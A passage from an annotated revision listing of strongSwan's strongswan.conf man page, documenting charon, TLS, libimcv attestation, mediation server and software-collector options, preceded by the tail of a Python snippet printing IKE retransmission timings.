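    print("default schedule:", retransmit_schedule())
    print("seconds to failure:", time_to_failure())
    print("with retransmit_limit=30:", retransmit_schedule(limit=30))
```

Lowering retransmit_tries or adding a limit shortens the time a half-open exchange is kept alive, at the price of giving up sooner on a slow or lossy path.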
                   1952: .TP
                   1953: .BR charon.retry_initiate_interval " [0]"
                   1954: Interval in seconds to use when retrying to initiate an IKE_SA (e.g. if DNS
                   1955: resolution failed), 0 to disable retries.
                   1956: 
                   1957: .TP
                   1958: .BR charon.reuse_ikesa " [yes]"
                   1959: Initiate CHILD_SA within existing IKE_SAs (always enabled for IKEv1).
                   1960: 
                   1961: .TP
                   1962: .BR charon.routing_table " []"
                   1963: Numerical routing table to install routes to.
                   1964: 
                   1965: .TP
                   1966: .BR charon.routing_table_prio " []"
                   1967: Priority of the routing table.
                   1968: 
                   1969: .TP
                   1970: .BR charon.rsa_pss " [no]"
                   1971: Whether to use RSA with PSS padding instead of PKCS#1 padding by default.
                   1972: 
                   1973: .TP
                   1974: .BR charon.send_delay " [0]"
                   1975: Delay in ms for sending packets, to simulate larger RTT.
                   1976: 
                   1977: .TP
                   1978: .BR charon.send_delay_request " [yes]"
                   1979: Delay request messages.
                   1980: 
                   1981: .TP
                   1982: .BR charon.send_delay_response " [yes]"
                   1983: Delay response messages.
                   1984: 
                   1985: .TP
                   1986: .BR charon.send_delay_type " [0]"
                   1987: Specific IKEv2 message type to delay, 0 for any.
                   1988: 
                   1989: .TP
                   1990: .BR charon.send_vendor_id " [no]"
                   1991: Send strongSwan vendor ID payload.
                   1992: 
                   1993: .TP
                   1994: .BR charon.signature_authentication " [yes]"
                   1995: Whether to enable Signature Authentication as per RFC 7427.
                   1996: 
                   1997: .TP
                   1998: .BR charon.signature_authentication_constraints " [yes]"
                   1999: If enabled, signature schemes configured in
                   2000: .RI "" "rightauth" ","
                   2001: in addition to getting
                   2002: used as constraints against signature schemes employed in the certificate chain,
                   2003: are also used as constraints against the signature scheme used by peers during
                   2004: IKEv2.
                   2005: 
                   2006: .TP
                   2007: .BR charon.spi_label " [0x0000000000000000]"
                   2008: Value mixed into the local IKE SPIs after applying
                   2009: .RI "" "spi_mask" "."
                   2010: 
                   2011: 
                   2012: .TP
                   2013: .BR charon.spi_mask " [0x0000000000000000]"
                   2014: Mask applied to local IKE SPIs before mixing in
                   2015: .RI "" "spi_label" ""
                   2016: (bits set will be
                   2017: replaced with
                   2018: .RI "" "spi_label" ")."
                   2019: 
                   2020: 
                   2021: .TP
                   2022: .BR charon.spi_max " [0xcfffffff]"
                   2023: The upper limit for SPIs requested from the kernel for IPsec SAs.
                   2024: 
                   2025: .TP
                   2026: .BR charon.spi_min " [0xc0000000]"
                   2027: The lower limit for SPIs requested from the kernel for IPsec SAs. Should not be
                   2028: set lower than 0x00000100 (256), as SPIs between 1 and 255 are reserved by IANA.
                   2029: 
                   2030: .TP
                   2031: .B charon.start-scripts
                   2032: .br
                   2033: Section containing a list of scripts (name = path) that are executed when the
                   2034: daemon is started.
                   2035: 
                   2036: .TP
                   2037: .B charon.stop-scripts
                   2038: .br
                   2039: Section containing a list of scripts (name = path) that are executed when the
                   2040: daemon is terminated.
                   2041: 
                   2042: .TP
                   2043: .B charon.syslog
                   2044: .br
                   2045: Section to define syslog loggers, see LOGGER CONFIGURATION in
                   2046: .RB "" "strongswan.conf" "(5)."
                   2047: 
                   2048: 
                   2049: .TP
                   2050: .B charon.syslog.<facility>
                   2051: .br
                   2052: <facility> is one of the supported syslog facilities, see LOGGER CONFIGURATION
                   2053: in
                   2054: .RB "" "strongswan.conf" "(5)."
                   2055: 
                   2056: 
                   2057: .TP
                   2058: .BR charon.syslog.<facility>.<subsystem> " [<default>]"
                   2059: Loglevel for a specific subsystem.
                   2060: 
                   2061: .TP
                   2062: .BR charon.syslog.<facility>.default " [1]"
                   2063: Specifies the default loglevel to be used for subsystems for which no specific
                   2064: loglevel is defined.
                   2065: 
                   2066: .TP
                   2067: .BR charon.syslog.<facility>.ike_name " [no]"
                   2068: Prefix each log entry with the connection name and a unique numerical identifier
                   2069: for each IKE_SA.
                   2070: 
                   2071: .TP
1.1.1.2 ! misho    2072: .BR charon.syslog.<facility>.log_level " [no]"
        !          2073: Add the log level of each message after the subsystem (e.g. [IKE2]).
        !          2074: 
        !          2075: .TP
1.1       misho    2076: .BR charon.syslog.identifier " []"
                   2077: Global identifier used for an
                   2078: .RB "" "openlog" "(3)"
                   2079: call, prepended to each log message
                   2080: by syslog.  If not configured,
                   2081: .RB "" "openlog" "(3)"
                   2082: is not called, so the value will
                   2083: depend on system defaults (often the program name).
                   2084: 
                   2085: .TP
                   2086: .BR charon.threads " [16]"
                   2087: Number of worker threads in charon. Several of these are reserved for long
                   2088: running tasks in internal modules and plugins. Therefore, make sure you don't
                   2089: set this value too low. The number of idle worker threads listed in
                   2090: .RI "" "ipsec statusall" ""
                   2091: can be used as an indicator of the number of reserved threads.
                   2092: 
                   2093: .TP
                   2094: .BR charon.tls.cipher " []"
                   2095: List of TLS encryption ciphers.
                   2096: 
                   2097: .TP
1.1.1.2 ! misho    2098: .BR charon.tls.ke_group " []"
        !          2099: List of TLS key exchange groups.
        !          2100: 
        !          2101: .TP
1.1       misho    2102: .BR charon.tls.key_exchange " []"
                   2103: List of TLS key exchange methods.
                   2104: 
                   2105: .TP
                   2106: .BR charon.tls.mac " []"
                   2107: List of TLS MAC algorithms.
                   2108: 
                   2109: .TP
1.1.1.2 ! misho    2110: .BR charon.tls.send_certreq_authorities " [yes]"
        !          2111: Whether to include CAs in a server's CertificateRequest message. May be disabled
        !          2112: if clients can't handle a long list of CAs.
        !          2113: 
        !          2114: .TP
        !          2115: .BR charon.tls.signature " []"
        !          2116: List of TLS signature schemes.
        !          2117: 
        !          2118: .TP
1.1       misho    2119: .BR charon.tls.suites " []"
                   2120: List of TLS cipher suites.
                   2121: 
                   2122: .TP
1.1.1.2 ! misho    2123: .BR charon.tls.version_max " [1.2]"
        !          2124: Maximum TLS version to negotiate.
        !          2125: 
        !          2126: .TP
        !          2127: .BR charon.tls.version_min " [1.2]"
        !          2128: Minimum TLS version to negotiate.
        !          2129: 
        !          2130: .TP
1.1       misho    2131: .BR charon.tnc.tnc_config " [/etc/tnc_config]"
                   2132: TNC IMC/IMV configuration file.
                   2133: 
                   2134: .TP
                   2135: .BR charon.user " []"
                   2136: Name of the user the daemon changes to after startup.
                   2137: 
                   2138: .TP
                   2139: .BR charon.x509.enforce_critical " [yes]"
                   2140: Discard certificates with unsupported or unknown critical extensions.
                   2141: 
                   2142: .TP
                   2143: .BR charon-nm.ca_dir " [<default>]"
                   2144: Directory from which to load CA certificates if no certificate is configured.
                   2145: 
                   2146: .TP
                   2147: .B charon-systemd.journal
                   2148: .br
                   2149: Section to configure native systemd journal logger, very similar to the syslog
                   2150: logger as described in LOGGER CONFIGURATION in
                   2151: .RB "" "strongswan.conf" "(5)."
                   2152: 
                   2153: 
                   2154: .TP
                   2155: .BR charon-systemd.journal.<subsystem> " [<default>]"
                   2156: Loglevel for a specific subsystem.
                   2157: 
                   2158: .TP
                   2159: .BR charon-systemd.journal.default " [1]"
                   2160: Specifies the default loglevel to be used for subsystems for which no specific
                   2161: loglevel is defined.
                   2162: 
                   2163: .TP
                   2164: .BR imv_policy_manager.command_allow " []"
                   2165: Shell command to be executed with recommendation allow.
                   2166: 
                   2167: .TP
                   2168: .BR imv_policy_manager.command_block " []"
                   2169: Shell command to be executed with all other recommendations.
                   2170: 
                   2171: .TP
                   2172: .BR imv_policy_manager.database " []"
                   2173: Database URI for the database that stores the package information. If it
                   2174: contains a password, make sure to adjust the permissions of the config file
                   2175: accordingly.
                   2176: 
                   2177: .TP
                   2178: .BR imv_policy_manager.load " [sqlite]"
                   2179: Plugins to load in IMV policy manager.
                   2180: 
                   2181: .TP
                   2182: .BR libimcv.debug_level " [1]"
                   2183: Debug level for a stand\-alone
                   2184: .RI "" "libimcv" ""
                   2185: library.
                   2186: 
                   2187: .TP
                   2188: .BR libimcv.load " [random nonce gmp pubkey x509]"
                   2189: Plugins to load in IMC/IMVs with stand\-alone
                   2190: .RI "" "libimcv" ""
                   2191: library.
                   2192: 
                   2193: .TP
                   2194: .BR libimcv.plugins.imc-attestation.aik_blob " []"
                   2195: AIK encrypted private key blob file.
                   2196: 
                   2197: .TP
                   2198: .BR libimcv.plugins.imc-attestation.aik_cert " []"
                   2199: AIK certificate file.
                   2200: 
                   2201: .TP
                   2202: .BR libimcv.plugins.imc-attestation.aik_handle " []"
                   2203: AIK object handle.
                   2204: 
                   2205: .TP
                   2206: .BR libimcv.plugins.imc-attestation.aik_pubkey " []"
                   2207: AIK public key file.
                   2208: 
                   2209: .TP
1.1.1.2 ! misho    2210: .BR libimcv.plugins.imc-attestation.hash_algorithm " [sha384]"
        !          2211: Preferred measurement hash algorithm.
        !          2212: 
        !          2213: .TP
1.1       misho    2214: .BR libimcv.plugins.imc-attestation.mandatory_dh_groups " [yes]"
                   2215: Enforce mandatory Diffie\-Hellman groups.
                   2216: 
                   2217: .TP
                   2218: .BR libimcv.plugins.imc-attestation.nonce_len " [20]"
                   2219: DH nonce length.
                   2220: 
                   2221: .TP
                   2222: .BR libimcv.plugins.imc-attestation.pcr17_after " []"
                   2223: PCR17 value after measurement.
                   2224: 
                   2225: .TP
                   2226: .BR libimcv.plugins.imc-attestation.pcr17_before " []"
                   2227: PCR17 value before measurement.
                   2228: 
                   2229: .TP
                   2230: .BR libimcv.plugins.imc-attestation.pcr17_meas " []"
                   2231: Dummy measurement value extended into PCR17 if the TBOOT log is not available.
                   2232: 
                   2233: .TP
                   2234: .BR libimcv.plugins.imc-attestation.pcr18_after " []"
                   2235: PCR18 value after measurement.
                   2236: 
                   2237: .TP
                   2238: .BR libimcv.plugins.imc-attestation.pcr18_before " []"
                   2239: PCR18 value before measurement.
                   2240: 
                   2241: .TP
                   2242: .BR libimcv.plugins.imc-attestation.pcr18_meas " []"
                   2243: Dummy measurement value extended into PCR18 if the TBOOT log is not available.
                   2244: 
                   2245: .TP
                   2246: .BR libimcv.plugins.imc-attestation.pcr_info " [no]"
                   2247: Whether to send pcr_before and pcr_after info.
                   2248: 
                   2249: .TP
1.1.1.2 ! misho    2250: .BR libimcv.plugins.imc-attestation.pcr_padding " [no]"
        !          2251: Whether to pad IMA SHA1 measurement values when extending into the SHA256 PCR bank.
        !          2252: 
        !          2253: .TP
1.1       misho    2254: .BR libimcv.plugins.imc-attestation.use_quote2 " [yes]"
                   2255: Use Quote2 AIK signature instead of Quote signature.
                   2256: 
                   2257: .TP
                   2258: .BR libimcv.plugins.imc-attestation.use_version_info " [no]"
                   2259: Whether Version Info is included in the Quote2 signature.
                   2260: 
                   2261: .TP
                   2262: .BR libimcv.plugins.imc-hcd.push_info " [yes]"
                   2263: Send quadruple info without being prompted.
                   2264: 
                   2265: .TP
                   2266: .BR libimcv.plugins.imc-hcd.subtypes " []"
                   2267: Section to define PWG HCD PA subtypes.
                   2268: 
                   2269: .TP
                   2270: .BR libimcv.plugins.imc-hcd.subtypes.<section> " []"
                   2271: Defines a PWG HCD PA subtype section. Recognized subtype section names are
                   2272: .RI "" "system" ","
                   2273: .RI "" "control" ","
                   2274: .RI "" "marker" ","
                   2275: .RI "" "finisher" ","
                   2276: .RI "" "interface" ""
                   2277: and
                   2278: .RI "" "scanner" "."
                   2279: 
                   2280: 
                   2281: .TP
                   2282: .BR libimcv.plugins.imc-hcd.subtypes.<section>.<sw_type> " []"
                   2283: Defines a software type section. Recognized software type section names are
                   2284: .RI "" "firmware" ","
                   2285: .RI "" "resident_application" ""
                   2286: and
                   2287: .RI "" "user_application" "."
                   2288: 
                   2289: 
                   2290: .TP
                   2291: .BR libimcv.plugins.imc-hcd.subtypes.<section>.<sw_type>.<software> " []"
                   2292: Defines a software section having an arbitrary name.
                   2293: 
                   2294: .TP
                   2295: .BR libimcv.plugins.imc-hcd.subtypes.<section>.<sw_type>.<software>.name " []"
                   2296: Name of the software installed on the hardcopy device.
                   2297: 
                   2298: .TP
                   2299: .BR libimcv.plugins.imc-hcd.subtypes.<section>.<sw_type>.<software>.patches " []"
                   2300: String describing all patches applied to the given software on this hardcopy
                   2301: device. The individual patches are separated by a newline character '\\n'.
                   2302: 
                   2303: .TP
                   2304: .BR libimcv.plugins.imc-hcd.subtypes.<section>.<sw_type>.<software>.string_version " []"
                   2305: String describing the version of the given software on this hardcopy device.
                   2306: 
                   2307: .TP
                   2308: .BR libimcv.plugins.imc-hcd.subtypes.<section>.<sw_type>.<software>.version " []"
                   2309: Hex\-encoded version string with a length of 16 octets consisting of the fields
                   2310: major version number (4 octets), minor version number (4 octets), build number
                   2311: (4 octets), service pack major number (2 octets) and service pack minor number
                   2312: (2 octets).
                   2313: 
                   2314: .TP
                   2315: .BR libimcv.plugins.imc-hcd.subtypes.<section>.attributes_natural_language " [en]"
                   2316: Variable\-length natural language tag conforming to RFC 5646 that specifies the
                   2317: language to be used in the health assessment message of a given subtype.
                   2318: 
                   2319: .TP
                   2320: .BR libimcv.plugins.imc-hcd.subtypes.system.certification_state " []"
                   2321: Hex\-encoded certification state.
                   2322: 
                   2323: .TP
                   2324: .BR libimcv.plugins.imc-hcd.subtypes.system.configuration_state " []"
                   2325: Hex\-encoded configuration state.
                   2326: 
                   2327: .TP
                   2328: .BR libimcv.plugins.imc-hcd.subtypes.system.machine_type_model " []"
                   2329: String specifying the machine type and model of the hardcopy device.
                   2330: 
                   2331: .TP
                   2332: .BR libimcv.plugins.imc-hcd.subtypes.system.pstn_fax_enabled " [no]"
                   2333: Specifies if a PSTN facsimile interface is installed and enabled on the hardcopy
                   2334: device.
                   2335: 
                   2336: .TP
                   2337: .BR libimcv.plugins.imc-hcd.subtypes.system.time_source " []"
                   2338: String specifying the hostname of the network time server used by the hardcopy
                   2339: device.
                   2340: 
                   2341: .TP
                   2342: .BR libimcv.plugins.imc-hcd.subtypes.system.user_application_enabled " [no]"
                   2343: Specifies if users can dynamically download and execute applications on the
                   2344: hardcopy device.
                   2345: 
                   2346: .TP
                   2347: .BR libimcv.plugins.imc-hcd.subtypes.system.user_application_persistence_enabled " [no]"
                   2348: Specifies if user dynamically downloaded applications can persist outside the
                   2349: boundaries of a single job on the hardcopy device.
                   2350: 
                   2351: .TP
                   2352: .BR libimcv.plugins.imc-hcd.subtypes.system.vendor_name " []"
                   2353: String specifying the manufacturer of the hardcopy device.
                   2354: 
                   2355: .TP
                   2356: .BR libimcv.plugins.imc-hcd.subtypes.system.vendor_smi_code " []"
                   2357: Integer specifying the globally unique 24\-bit SMI code assigned to the
                   2358: manufacturer of the hardcopy device.
                   2359: 
                   2360: .TP
                   2361: .BR libimcv.plugins.imc-os.device_cert " []"
                   2362: Manually set the path to the client device certificate (e.g.
                   2363: /etc/pts/aikCert.der)
                   2364: 
                   2365: .TP
                   2366: .BR libimcv.plugins.imc-os.device_handle " []"
                   2367: Manually set handle to a private key bound to a smartcard or TPM (e.g.
                   2368: 0x81010004)
                   2369: 
                   2370: .TP
                   2371: .BR libimcv.plugins.imc-os.device_id " []"
                   2372: Manually set the client device ID in hexadecimal format (e.g.
                   2373: 1083f03988c9762703b1c1080c2e46f72b99cc31)
                   2374: 
                   2375: .TP
                   2376: .BR libimcv.plugins.imc-os.device_pubkey " []"
                   2377: Manually set the path to the client device public key (e.g. /etc/pts/aikPub.der)
                   2378: 
                   2379: .TP
                   2380: .BR libimcv.plugins.imc-os.push_info " [yes]"
                   2381: Send operating system info without being prompted.
                   2382: 
                   2383: .TP
                   2384: .BR libimcv.plugins.imc-scanner.push_info " [yes]"
                   2385: Send open listening ports without being prompted.
                   2386: 
                   2387: .TP
                   2388: .BR libimcv.plugins.imc-swima.eid_epoch " [0x11223344]"
                   2389: Set the 32\-bit epoch value for event IDs manually if the software collector
                   2390: database is not available.
                   2391: 
                   2392: .TP
                   2393: .BR libimcv.plugins.imc-swima.subscriptions " [no]"
                   2394: Accept SW Inventory or SW Events subscriptions.
                   2395: 
                   2396: .TP
                   2397: .BR libimcv.plugins.imc-swima.swid_database " []"
                   2398: URI to software collector database containing event timestamps, software
                   2399: creation and deletion events and collected software identifiers. If it contains
                   2400: a password, make sure to adjust the permissions of the config file accordingly.
                   2401: 
                   2402: .TP
                   2403: .BR libimcv.plugins.imc-swima.swid_directory " [${prefix}/share]"
                   2404: Directory where SWID tags are located.
                   2405: 
                   2406: .TP
                   2407: .BR libimcv.plugins.imc-swima.swid_full " [no]"
                   2408: Include file information in the XML\-encoded SWID tags.
                   2409: 
                   2410: .TP
                   2411: .BR libimcv.plugins.imc-swima.swid_pretty " [no]"
                   2412: Generate XML\-encoded SWID tags with pretty indentation.
                   2413: 
                   2414: .TP
                   2415: .BR libimcv.plugins.imc-test.additional_ids " [0]"
                   2416: Number of additional IMC IDs.
                   2417: 
                   2418: .TP
                   2419: .BR libimcv.plugins.imc-test.command " [none]"
                   2420: Command to be sent to the Test IMV.
                   2421: 
                   2422: .TP
                   2423: .BR libimcv.plugins.imc-test.dummy_size " [0]"
                   2424: Size of dummy attribute to be sent to the Test IMV (0 = disabled).
                   2425: 
                   2426: .TP
                   2427: .BR libimcv.plugins.imc-test.retry " [no]"
                   2428: Do a handshake retry.
                   2429: 
                   2430: .TP
                   2431: .BR libimcv.plugins.imc-test.retry_command " []"
                   2432: Command to be sent to the Test IMV in the handshake retry.
                   2433: 
                   2434: .TP
                   2435: .BR libimcv.plugins.imv-attestation.cadir " []"
                   2436: Path to directory with AIK cacerts.
                   2437: 
                   2438: .TP
                   2439: .BR libimcv.plugins.imv-attestation.dh_group " [ecp256]"
                   2440: Preferred Diffie\-Hellman group.
                   2441: 
                   2442: .TP
1.1.1.2 ! misho    2443: .BR libimcv.plugins.imv-attestation.hash_algorithm " [sha384]"
1.1       misho    2444: Preferred measurement hash algorithm.
                   2445: 
                   2446: .TP
                   2447: .BR libimcv.plugins.imv-attestation.mandatory_dh_groups " [yes]"
                   2448: Enforce mandatory Diffie\-Hellman groups.
                   2449: 
                   2450: .TP
                   2451: .BR libimcv.plugins.imv-attestation.min_nonce_len " [0]"
                   2452: DH minimum nonce length.
                   2453: 
                   2454: .TP
                   2455: .BR libimcv.plugins.imv-os.remediation_uri " []"
                   2456: URI pointing to operating system remediation instructions.
                   2457: 
                   2458: .TP
                   2459: .BR libimcv.plugins.imv-scanner.remediation_uri " []"
                   2460: URI pointing to scanner remediation instructions.
                   2461: 
                   2462: .TP
                   2463: .BR libimcv.plugins.imv-swima.rest_api.timeout " [120]"
                   2464: Timeout of SWID REST API HTTP POST transaction.
                   2465: 
                   2466: .TP
                   2467: .BR libimcv.plugins.imv-swima.rest_api.uri " []"
                   2468: HTTP URI of the SWID REST API.
                   2469: 
                   2470: .TP
                   2471: .BR libimcv.plugins.imv-test.rounds " [0]"
                   2472: Number of IMC\-IMV retry rounds.
                   2473: 
                   2474: .TP
                   2475: .BR libimcv.stderr_quiet " [no]"
                   2476: Disable output to stderr with a stand\-alone
                   2477: .RI "" "libimcv" ""
                   2478: library.
                   2479: 
                   2480: .TP
                   2481: .BR libimcv.swid_gen.command " [/usr/local/bin/swid_generator]"
                   2482: SWID generator command to be executed.
                   2483: 
                   2484: .TP
                   2485: .BR libimcv.swid_gen.tag_creator.name " [strongSwan Project]"
                   2486: Name of the tagCreator entity.
                   2487: 
                   2488: .TP
                   2489: .BR libimcv.swid_gen.tag_creator.regid " [strongswan.org]"
                   2490: regid of the tagCreator entity.
                   2491: 
                   2492: .TP
                   2493: .BR manager.database " []"
                   2494: Credential database URI for manager. If it contains a password, make sure to
                   2495: adjust the permissions of the config file accordingly.
                   2496: 
                   2497: .TP
                   2498: .BR manager.debug " [no]"
                   2499: Enable debugging in manager.
                   2500: 
                   2501: .TP
                   2502: .BR manager.load " []"
                   2503: Plugins to load in manager.
                   2504: 
                   2505: .TP
                   2506: .BR manager.socket " []"
                   2507: FastCGI socket of manager, to run it statically.
                   2508: 
                   2509: .TP
                   2510: .BR manager.threads " [10]"
                   2511: Threads to use for request handling.
                   2512: 
                   2513: .TP
                   2514: .BR manager.timeout " [15m]"
                   2515: Session timeout for manager.
                   2516: 
                   2517: .TP
                   2518: .BR medsrv.database " []"
                   2519: Mediation server database URI. If it contains a password, make sure to adjust
                   2520: the permissions of the config file accordingly.
                   2521: 
                   2522: .TP
                   2523: .BR medsrv.debug " [no]"
                   2524: Debugging in mediation server web application.
                   2525: 
                   2526: .TP
                   2527: .BR medsrv.dpd " [5m]"
                   2528: DPD timeout to use in mediation server plugin.
                   2529: 
                   2530: .TP
                   2531: .BR medsrv.load " []"
                   2532: Plugins to load in mediation server plugin.
                   2533: 
                   2534: .TP
                   2535: .BR medsrv.password_length " [6]"
                   2536: Minimum password length required for mediation server user accounts.
                   2537: 
                   2538: .TP
                   2539: .BR medsrv.rekey " [20m]"
                   2540: Rekeying time on mediation connections in mediation server plugin.
                   2541: 
                   2542: .TP
                   2543: .BR medsrv.socket " []"
                   2544: Run Mediation server web application statically on socket.
                   2545: 
                   2546: .TP
                   2547: .BR medsrv.threads " [5]"
                   2548: Number of threads for the mediation service web application.
                   2549: 
                   2550: .TP
                   2551: .BR medsrv.timeout " [15m]"
                   2552: Session timeout for mediation service.
                   2553: 
                   2554: .TP
                   2555: .BR pki.load " []"
                   2556: Plugins to load in ipsec pki tool.
                   2557: 
                   2558: .TP
                   2559: .BR pool.database " []"
                   2560: Database URI for the database that stores IP pools and configuration attributes.
                   2561: If it contains a password, make sure to adjust the permissions of the
                   2562: config file accordingly.
                   2563: 
                   2564: .TP
                   2565: .BR pool.load " []"
                   2566: Plugins to load in ipsec pool tool.
                   2567: 
                   2568: .TP
                   2569: .BR scepclient.load " []"
                   2570: Plugins to load in ipsec scepclient tool.
                   2571: 
                   2572: .TP
                   2573: .B sec-updater
                   2574: .br
                   2575: Options for the sec\-updater tool.
                   2576: 
                   2577: .TP
                   2578: .BR sec-updater.database " []"
                   2579: Global IMV policy database URI. If it contains a password, make sure to adjust
                   2580: the permissions of the config file accordingly.
                   2581: 
                   2582: .TP
                   2583: .BR sec-updater.load " []"
                   2584: Plugins to load in sec\-updater tool.
                   2585: 
                   2586: .TP
                   2587: .BR sec-updater.swid_gen.command " [/usr/local/bin/swid_generator]"
                   2588: SWID generator command to be executed.
                   2589: 
                   2590: .TP
                   2591: .BR sec-updater.swid_gen.tag_creator.name " [strongSwan Project]"
                   2592: Name of the tagCreator entity.
                   2593: 
                   2594: .TP
                   2595: .BR sec-updater.swid_gen.tag_creator.regid " [strongswan.org]"
                   2596: regid of the tagCreator entity.
                   2597: 
                   2598: .TP
                   2599: .BR sec-updater.tmp.deb_file " [/tmp/sec-updater.deb]"
                   2600: Temporary storage for downloaded deb package file.
                   2601: 
                   2602: .TP
                   2603: .BR sec-updater.tmp.tag_file " [/tmp/sec-updater.tag]"
                   2604: Temporary storage for generated SWID tags.
                   2605: 
                   2606: .TP
                   2607: .BR sec-updater.tnc_manage_command " [/var/www/tnc/manage.py]"
                   2608: strongTNC manage.py command used to import SWID tags.
                   2609: 
                   2610: .TP
                   2611: .BR starter.config_file " [${sysconfdir}/ipsec.conf]"
                   2612: Location of the ipsec.conf file.
                   2613: 
                   2614: .TP
                   2615: .BR starter.load_warning " [yes]"
                   2616: Disable charon plugin load option warning.
                   2617: 
                   2618: .TP
                   2619: .B sw-collector
                   2620: .br
                   2621: Options for the sw\-collector tool.
                   2622: 
                   2623: .TP
                   2624: .BR sw-collector.database " []"
                   2625: URI to software collector database containing event timestamps, software
                   2626: creation and deletion events and collected software identifiers. If it contains
                   2627: a password, make sure to adjust the permissions of the config file accordingly.
                   2628: 
                   2629: .TP
                   2630: .BR sw-collector.first_file " [/var/log/bootstrap.log]"
                   2631: Path pointing to file created when the Linux OS was installed.
                   2632: 
                   2633: .TP
                   2634: .BR sw-collector.first_time " [0000-00-00T00:00:00Z]"
                   2635: Time in UTC when the Linux OS was installed.
                   2636: 
                   2637: .TP
                   2638: .BR sw-collector.history " []"
                   2639: Path pointing to apt history.log file.
                   2640: 
                   2641: .TP
                   2642: .BR sw-collector.load " []"
                   2643: Plugins to load in sw\-collector tool.
                   2644: 
                   2645: .TP
                   2646: .BR sw-collector.rest_api.timeout " [120]"
                   2647: Timeout of REST API HTTP POST transaction.
                   2648: 
                   2649: .TP
                   2650: .BR sw-collector.rest_api.uri " []"
                   2651: HTTP URI of the central collector's REST API.
                   2652: 
                   2653: .TP
                   2654: .BR swanctl.load " []"
                   2655: Plugins to load in swanctl.
                   2656: 
                   2657: .TP
                   2658: .BR swanctl.socket " [unix://${piddir}/charon.vici]"
                   2659: VICI socket to connect to by default.
                   2660: 
